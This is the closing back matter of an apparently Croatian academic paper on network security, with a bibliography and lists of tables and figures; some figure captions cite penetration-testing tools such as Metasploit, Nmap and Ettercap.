http://security.lss.hr/documents/LinkedDocuments/CCERT-PUBDOC-2003-10-44.pdf 24.03.2014.
7. CIS FER. (2011). Kriptiranje elektronike pote. http://www.cis.hr/sigurosnialati/kriptiranje-elektronicke-poste.html. - 07.04.2014.
8. CIS FER, (2011). Mesh mree, CIS-DOC-2011-03-008,
http://www.cis.hr/files/dokumenti/CIS-DOC-2011-03-008(1).pdf - 26.03.2014.
9. CIS FER, (2011). Nadzor korisnika s poveanim ovlastima. CIS-DOC-2011-01-002.
http://www.cis.hr/files/dokumenti/CIS-DOC-2011-01-002.pdf - 07.04.2014.
10. CIS FER, (2011). SnortIDS. CIS-DOC-2011-10-028,
http://www.cis.hr/files/dokumenti/CIS-DOC-2011-10-028.pdf - 07.04.2014.
11. CIS FER, (2011). Zatita od prislukivanja mrenog prometa, CIS-DOC-2011-10-029,
http://www.cis.hr/files/dokumenti/CIS-DOC-2011-10-029.pdf - 25.03.2014.
12. COMMISSION OF THE EUROPEAN COMMUNITIES (1993). Information
Technology Security Evaluation Manual (ITSEM), Brusselles,

129

http://os2.zemris.fer.hr/ISMS/2008_marceta/Evaluacija%20i%20ispitivanje
%20sigurnosti%20sustava_files/itsem-en.pdf - 05.03.2014.
13. DoS Napadi, CARNet CERT-a i LS&S
http://sigurnost.lss.hr/documents/LinkedDocuments/CCERT-PUBDOC-2006-11-162.pdf
- 05.03.2014.
14. Denial-of-service attacks, http://en.wikipedia.org/wiki/Denial-of-service - 05.03.2014.
15. Feringa, A., Goguen. A. i Stoneburner, G. Risk Management Guide for Information
Technology Systems (2001). National Institute of Standards and Technology.
Washington: US Government printing office.
http://os2.zemris.fer.hr/ISMS/2008_marceta/Evaluacija%20i%20ispitivanje
%20sigurnosti%20sustava_files/nisrisk_mang_guide_infor_tech_systems_pub_800_30.pdf - 06.03.2014.
16. Hadjina, N., (2009). Zatita i sigurnost informacijskih sustava (nastavni materijali sa
zbirkom zadataka). FER Zavod za primijenjeno raunarstvo,
http://www.smartgrids.hr/_download/repository/SkriptaZaStudente200912%5B1%5D.pdf - 26.03.2014.
17. Holl, K. (2003). Global Information Assurance Certification Paper. SANS Institute,
http://www.giac.org/paper/gsec/2868/osi-defense-in-depth-increase-applicationsecurity/104841 - 14.03.2014.
18. Klari, I. (2007). Naini zlouporabe ranjivosti raunalnog sustava.
http://os2.zemris.fer.hr/ns/malware/2007_klaric/sql_injekcija.html - 07.04.2014.
19. Kra, A., Svilii, B. (2005). Zatita privatnosti raunalnog sustava. Pomorstvo, god. 19.
(2005), str. 275-284. http://hrcak.srce.hr/file/6510 07.04.2014.
20. Mareta, M. (2008). Ispitivanje i evaluacija sigurnosti seminarski rad. Sveuilite u
Zagrebu, Fakultet elektrotehnike i raunarstva.
http://os2.zemris.fer.hr/ISMS/2008_marceta/Evaluacija%20i%20ispitivanje
%20sigurnosti%20sustava.htm - 24.03.2014.
21. Peuhkuri, M. Denial of service attacks.
http://www.netlab.tkk.fi/opetus/s38153/k2005/slides/handout-10dos.pdf - 05.03.2014.
22. Popovi, M. (2006). Nadziranje pristupa raunalnim sustavima zasnovanim na
uslugama. Magistarski rad. Zagreb, Sveuilite u Zagrebu, Fakultet elektrotehnike i
raunarstva. https://bib.irb.hr/datoteka/277854.Magistarski_MiroslavPopovic.pdf 05.04.2014.

130

23. Pralas, T. (2008). Raunalne mree Ethernet, http://sistemac.carnet.hr/node/356 21.03.2014.


24. Pralas, T. (2008). Raunalne mree Pasivna i aktivna mrena oprema,
http://sistemac.carnet.hr/node/374 - 21.03.2014.
25. Pralas, T. (2008). Raunalne mree razvoj i znaajke, CARNet,
http://sistemac.carnet.hr/node/343 - 04.03.2014.
26. Rannenberg, K. (2008). Recent Development in Information Technology Security
Evaluation The Need for Evaluation Criteria for multilateral Security, Department for
Telematics, Institute for Informatics and Society. University of Freiburg. Germany, pp.
113-128, http://os2.zemris.fer.hr/ISMS/2008_marceta/Evaluacija%20i%20ispitivanje
%20sigurnosti%20sustava_files/RecentDevelopmentinInformation.pdf - 14.03.2014.
27. RFC 6194. Security Considerations for the SHA-0 and SHA-1 Message-Digest
Algorithms, http://tools.ietf.org/html/rfc6194, 14.03.2014.
28. Sartori, L. (2005). Pregled referentnih modela komunikacijskih protokola. Sveuilini
raunski centar Zagreb, http://sistemac-arhiva.srce.hr/index.php%3F%26id
%3D89%26backPID%3D88%26begin_at%3D25%26pS%3D1109631600%26pL
%3D2674799%26arc%3D1%26tt_news%3D397%26cHash%3D4bd8c3f006.html 17.03.2014.
29. Sartori, L. Sigurnost raunalnih mrea,
http://marjan.fesb.hr/~pravdica/srm/srm_pogl1_bez_pozadine.pdf - 17.03.2014.
30. Sever, D. Osnove sigurnosti Microsoft mrenih sustava. Zagreb. Sveuilini raunski
centar (SRCE). http://sistemac.srce.unizg.hr/fileadmin/user_root/seminari/Srce-SysSeminari-Osnove_sigurnosti_MS_mreznih_sustava.pdf - 07.04.2014.
31. Souppaya, M., Miles, T. i Wack, J. (2003). Guideline on Network Security Testing,
Recommendations of the National Institute of Standards and Technology, NIST Special
Publication 800-42, http://os2.zemris.fer.hr/ISMS/2008_marceta/Evaluacija%20i
%20ispitivanje%20sigurnosti%20sustava_files/NIST-SP800-42.pdf - 06.03.2014.
32. ako, Z. i dr. (2011). Slabosti web aplikacija: Pregled modernih metoda
kompromitiranja i zatite sigurnosti weba. Projektna dokumentacija. Sveuilite u
Zagrebu, Fakultet organizacije i informatike Varadin. https://www.google.hr/url?
q=http://slabosti-web-aplikacija.googlecode.com/files/Slabosti%2520web
%2520aplikacija.pdf&sa=U&ei=eaJCU5eCLqv_ygOp_4CICA&ved=0CBkQFjAA&usg
=AFQjCNGEsn5BeaRYZ2i0koY5zmvv_dJGGg - 07.04.2014.

131

33. egudovi, H. (2004). Sto sigurnosnih lokota. BUG Online.


http://www.bug.hr/mreza/tekst/opis-vpn-tehnologija/54984.aspx - 07.04.2014.
34. Trek, Denis (2006). Managing information systems security and privacy. Birkhauser.
str. 69. - 06.03.2014.
35. Zeki-Suac, M. (2009). Komunikacija i mree., http://informatika.efos.hr/wpcontent/uploads/2012/04/P7_Komunikacije_i_mreze.pdf - 21.03.2014.
36. Zelanto, M. (2007). Zlouporaba ranjivosti raunalnih sustava,
http://os2.zemris.fer.hr/ns/malware/2007_zelanto/index.html - 17.03.2014.
37. http://os2.zemris.fer.hr/ISMS/2008_marceta/Evaluacija%20i%20ispitivanje
%20sigurnosti%20sustava.htm 06.03.2014.
38. www.gartner.com - 06.03.2014.
39. http://technet.microsoft.com/en-us/magazine/2008.10.securitywatch.aspx- 07.03.2014.
40. http://www.windowsecurity.com/articles/Analysis_of_Buffer_Overflow_Attacks.html 06.03.2014.
41. http://en.wikipedia.org/wiki/ARP_spoofing - 14.03.2014.
42. https://github.com/rapid7/metasploit-framework/releases - 05.03.2014.
43. http://ettercap.github.io/ettercap/ - 21.03.2014.
44. http://www.cis.hr/dokumenti/zastita-od-prisluskivanja-mreznog-prometa.html 12.03.2014.
45. http://www.fer.hr/_download/repository/ASP-Gomila.pdf - 07.04.2014.
46. http://www.cis.hr/sigurosni-alati/pracenje-mreznog-prometa.html - 15.03.2014.
47. http://www.unixwiz.net/techtips/sql-injection.html - 17.03.2014.
48. http://en.wikipedia.org/wiki/SQL_injection - 07.03.2014.
49. http://support.microsoft.com/kb/103884 - 06.03.2014.
50. https://www.enisa.europa.eu/ - 04.03.2014.
51. http://www.iso27001security.com/html/27002.html - 12.03.2014.
52. http://www.comsec.spb.ru/matherials/is/iso15408-1.pdf - 06.03.2014.
53. http://en.wikipedia.org/wiki/Man-in-the-middle_attack - 18.03.2014.
54. http://hr.wikipedia.org/wiki/Bitcoin - 06.03.2014.
55. http://hr.wikipedia.org/wiki/RFID - 04.03.2014.
56. www.nist.com 12.03.2014.
57. http://www.cert.hr/advs.php?os=25&lang=hr&id=9236 17.03.2014.
58. http://www.cert.hr/advs.php?id=2951 14.03.2014.
59. http://hr.wikipedia.org/wiki/RFC - 15.03.2014.

132

60. http://en.wikipedia.org/wiki/SHA-1 - 06.03.2014.


61. http://www.cis.hr/sigurosni-alati/pracenje-mreznog-prometa.html - 12.03.2014.
62. http://hr.wikipedia.org/wiki/OSI_model - 06.03.2014.
63. http://en.wikipedia.org/wiki/ARPANET - 17.03.2014.
64. http://www.belarc.com/free_download.htm - 06.03.2014.
65. http://en.wikipedia.org/wiki/Common_Criteria 15.03.2014.
66. http://www.comsec.spb.ru/matherials/is/iso15408-1.pdf 15.03.2014.
67. http://www.iso27001security.com/html/27002.html - 15.03.2014.
68. http://hr.wikipedia.org/wiki/Kriptografija#Javni_klju.C4.8Devi - 14.03.2014.
69. http://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange - 14.03.2014.
70. http://en.wikipedia.org/wiki/Brute-force_attack - 14.03.2014.
71. http://en.wikipedia.org/wiki/Hash_function - 14.03.2014.
72. http://en.wikipedia.org/wiki/SHA-1#SHA-1_pseudocode 17.03.2014.
73. http://hr.wikipedia.org/wiki/MIME - 15.02.2014.
74. http://hr.wikipedia.org/wiki/Institute_of_Electrical_and_Electronics_Engineers 15.03.2014.
75. http://en.wikipedia.org/wiki/IPsec - 15.03.2014.
76. http://en.wikipedia.org/wiki/Ping_%28networking_utility%29 - 17.03.2014.
77. http://en.wikipedia.org/wiki/Transmission_Control_Protocol - 17.03.2014.
78. http://www.snort.org/ - 17.03.2014.
79. http://www.nod32.com.hr/tabid/2556/Default.aspx - 17.03.2014.
80. http://en.wikipedia.org/wiki/Exploit_%28computer_security%29 . 17.03.2014.
81. http://en.wikipedia.org/wiki/Privilege_escalation - 17.03.2014.
82. http://en.wikipedia.org/wiki/Denial-of-service_attack - 17.03.2014.
83. http://en.wikipedia.org/wiki/Denial-of-service_attack#Teardrop_attacks - 07.03.2014.
84. http://en.wikipedia.org/wiki/Superuser - 17.03.2014.
85. http://en.wikipedia.org/wiki/Zero-day_attack - 17.03.2014.
86. http://en.wikipedia.org/wiki/Script_kiddie. 17.03.2014.
87. http://krebsonsecurity.com/2010/10/java-a-gift-to-exploit-pack-makers/ - 17.03.2014.
88. http://www.princeton.edu/~achaney/tmve/wiki100k/docs/Exploit_%28computer_security
%29.html - 17.03.2014.
89. http://www.windowsecurity.com/articlestutorials/windows_os_security/Analysis_of_Buffer_Overflow_Attacks.html 17.03.2014.

133

90. http://en.wikipedia.org/wiki/Morris_worm - 24.03.2014.


91. http://en.wikipedia.org/wiki/Buffer_overflow - 24.03.2014.
92. http://www.phrack.org/issues.html?issue=49&id=14#article - 24.03.2014.
93. http://en.wikipedia.org/wiki/Code_Red_(computer_worm) - 24.03.2014.
94. http://en.wikipedia.org/wiki/SQL_Slammer - 23.03.2014.
95. http://www.windowsecurity.com/articles/Analysis_of_Buffer_Overflow_Attacks.html 17.03.2014.
96. http://stackoverflow.com/questions/79923/what-and-where-are-the-stack-and-heap.
17.03.2014.
97. http://en.wikipedia.org/wiki/Library_%28computing%29 - 17.03.2014.
98. http://publib.boulder.ibm.com/infocenter/javasdk/tools/index.jsp?topic=
%2Fcom.ibm.java.doc.igaa%2F_1vg000131402ee-11e49e6e566-7fda_1001.html 17.03.2014.
99. https://github.com/emeryberger/DieHard/ - 17.03.2014.
100.

http://doi.acm.org/10.1145/1866307.1866371 - 17.03.2014.

101.

http://securitytracker.com/id/1009181 - 17.03.2014.

102.

http://en.wikipedia.org/wiki/Integer_overflow - 17.03.2014.

103.

http://en.wikipedia.org/wiki/C99 - 20.03.2014.

104.

https://www.kb.cert.org/vuls/id/399896 - 17.03.2014.

105.

http://hr.wikipedia.org/wiki/SQL - 17.03.2014.

106.

http://en.wikipedia.org/wiki/Cross-site_scripting - 17.03.2014.

107.

http://www.computerhope.com/jargon/e/ethihack.htm - 16.03.2014.

108.

http://www.eccouncil.org/ - 06.03.2014.

109.

https://www.paterva.com/web6/ - 06.03.2014.

110.

http://en.wikipedia.org/wiki/Open-source_software - 17.03.2014.

111.

http://en.wikipedia.org/wiki/DNS_zone_transfer - 06.03.2014.

112.

http://manpages.ubuntu.com/manpages/raring/man1/dmitry.1.html 06.03.2014.

113.

http://hr.wikipedia.org/wiki/GNU - 06.03.2014.

114.

http://nmap.org/ - 06.03.2014.

115.

http://hr.wikipedia.org/wiki/Freeware - 06.03.2014.

116.

http://lcamtuf.coredump.cx/p0f3/ - 06.03.2014.

117.

www.openvas.org - 06.03.2014.

118.

http://www.metasploit.com/ - 06.03.2014.

119.

http://www.ampliasecurity.com/research/wcefaq.html - 06.03.2014.

134

120.

http://en.wikipedia.org/wiki/Pass_the_hash - 06.03.2014.

121.

http://en.wikipedia.org/wiki/Address_Resolution_Protocol - 06.03.2014.

122.

http://en.wikipedia.org/wiki/ARP_spoofing - 06.03.2014.

123.

http://hr.wikipedia.org/wiki/IEEE_802.11 - 06.03.2014.

124.

http://hr.wikipedia.org/wiki/WEP - 06.03.2014.

Popis tablica
-

Tablica 1: Usporedba HASH algoritama (Izvor: http://en.wikipedia.org/wiki/SHA-1


prilagoeno)

Popis slika

135

Slika 1: Fizike mrene topologije raunalne mree


(Izvor:http://sistemac.carnet.hr/node/342)

Slika 2: Protokoli u slojevima OSI mrenog modela (Izvor:


http://hr.wikipedia.org/wiki/Ra%C4%8Dunalne_mre%C5%BEe modificirano)

Slika 3: Vrste oienja, slijeva nadesno: Koaksijalni kabel, UTP kabel i optiki kabel
(Izvor: http://sistemac.carnet.hr/node/35)

Slika 4: Komponente pasivne mrene opreme, slijeva nadesno: patch, hub i


komunikacijski ormar (Izvor: http://sistemac.carnet.hr/node/374)

Slika 5: Komponente aktivne mrene opreme, slijeva nadesno switch i router (Izvor:
http://sistemac.carnet.hr/node/374)

Slika 6: Ilustracija IP adrese u decimalnom i binarnom obliku (Izvor:


http://en.wikipedia.org/wiki/IP_address)

Slika 7: Ilustracija WAN mrenog Windows okruenja (Izvor:


http://technet.microsoft.com/en-us/library/cc751403.aspx)

Slika 8: Osnovni principi evaluacije (Izvor:


http://os2.zemris.fer.hr/ISMS/2008_marceta/Evaluacija%20i%20ispitivanje
%20sigurnosti%20sustava.htm#_Toc20972390)

Slika 9: Belarc Advisor izvjetaj (Izvor:


http://os2.zemris.fer.hr/ISMS/2008_marceta/Evaluacija%20i%20ispitivanje
%20sigurnosti%20sustava.htm)

Slika 9: Struktura ifriranog sustava (Izvor: Radovan, M., (2011.) Raunalne mree (2).
Digital point tiskara, Rijeka)

Slika 10: Tablica preslikavanja znakova (Izvor: Radovan, M., (2011.) Raunalne mree
(2). Digital point tiskara, Rijeka)

Slika 11: Algoritam ifriranja po blokovima (Izvor: Radovan, M., (2011.) Raunalne
mree (2). Digital point tiskara, Rijeka)

Slika 12: ifriranje kod javnog i privatnog kljua (Izvor: Radovan, M., (2011.) Raunalne
mree (2). Digital point tiskara, Rijeka)

Slika 13: Preslikavanje sa hash funkcijom (: Radovan, M., (2011.) Raunalne mree (2).
Digital point tiskara, Rijeka)

Slika 14: Proces izrade digitalnog potpisa poruke (Izvor: Radovan, M., (2011.) Raunalne
mree (2). Digital point tiskara, Rijeka)

Slika 15: Utvrivanje autentinosti potpisa i integriteta poruke (Izvor: Radovan, M.,
(2011.) Raunalne mree (2). Digital point tiskara, Rijeka)

136

Slika 16: Poloaj SSL meusloja (Izvor: Radovan, M., (2011.) Raunalne mree (2).
Digital point tiskara, Rijeka)

Slika 17: Poloaj i uloga vatrozida (Izvor: Radovan, M., (2011.) Raunalne mree (2).
Digital point tiskara, Rijeka)

Slika 18: Neki primjerki postavki vatrozida (Izvor: Radovan, M., (2011.) Raunalne
mree (2). Digital point tiskara, Rijeka)

Slika 19: Tablica upravljanja pristupom (Izvor: Radovan, M., (2011.) Raunalne mree
(2). Digital point tiskara, Rijeka)

Slika 20: Organizacija procesa u memoriji (Izvor:


http://os2.zemris.fer.hr/ns/malware/2007_zelanto/buffer.html#321)

Slika 21: Izgled stoga nakon poziva funkcije (Izvor:


http://os2.zemris.fer.hr/ns/malware/2007_zelanto/buffer.html#321)

Slika 22: SQL injekcija (Izvor:


http://os2.zemris.fer.hr/ns/malware/2007_zelanto/sql.html)

Slika 23: Napad putem zlonamjernog link-a (Izvor:


http://os2.zemris.fer.hr/ns/malware/2007_zelanto/xss.html)

Slika 24: Slanje nedozvoljenog zahtjeva (Izvor:


http://os2.zemris.fer.hr/ns/malware/2007_zelanto/xss.html)

Slika 25: Kraa korisnikih kolaia (eng. cookies) (Izvor:


http://os2.zemris.fer.hr/ns/malware/2007_zelanto/xss.html)

Slika 26: Maltego CaseFile suelje sa odabranom metom (Izvor: Pritchett, W.L., Smet,
D.D., (2013.). Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 27: Maltego CaseFile suelje sa opcijama prikupljanja informacija (Izvor: Pritchett,
W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing, Birmingham
Mumbai)

Slika 28: Maltego CaseFile suelje sa prikupljenim informacijama (Izvor: Pritchett, W.L.,
Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 29: Enumeracija DNSenum alatom (Izvor: Pritchett, W.L., Smet, D.D., (2013.).
Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 30 : Rezultati prikupljeni sintaksom naredbe dmitry (Izvor: Pritchett, W.L., Smet,
D.D., (2013.). Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 31: Rezultati identifikacije prikupljeni sintaksom naredbe nping softvera Nmap
(Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai)

137

Slika 32: Podaci o portovima prikupljeni sintaksom naredbe nping softvera Nmap (Izvor:
Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai)

Slika 33: Podaci o operativnom sustavu prikupljeni uporabom softvera Nmap (Izvor:
Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai)

Slika 34: OpenVAS konfiguracijsko suelje (Izvor: Pritchett, W.L., Smet, D.D., (2013.).
Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 35: OpenVAS suelje izvrene pretrage mrenih ranjivosti (Izvor: Pritchett, W.L.,
Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 36: Izgled Armitage grafikog suelja za Metasploit (Izvor: Pritchett, W.L., Smet,
D.D., (2013.). Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 37: Browser_autopwn modul (Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali
Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 38: Meterpreter shell sesija (Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux
Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 39: Opcije Meterpreter naredbe use incognito (Izvor: Pritchett, W.L., Smet, D.D.,
(2013.). Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 40: Korisniki rauni na meti (Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali
Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 41: Meterpreter persistance backdoor (Izvor: Pritchett, W.L., Smet, D.D., (2013.).
Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 42: Pozicija sniffera unutar mree (Izvor: http://www.cis.hr/sigurosnialati/pracenje-mreznog-prometa.html)

Slika 43: Popis meta dobivenih skeniranjem raspona IP adresa (Izvor: Pritchett, W.L.,
Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 44: ARP poisoning u Ettercap suelju (Izvor: Pritchett, W.L., Smet, D.D., (2013.).
Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

Slika 45: Ettercap suelje MITM napada (Izvor: Pritchett, W.L., Smet, D.D., (2013.).
Kali Linux Cookbook, Packt Publishing, Birmingham Mumbai)

138

You might also like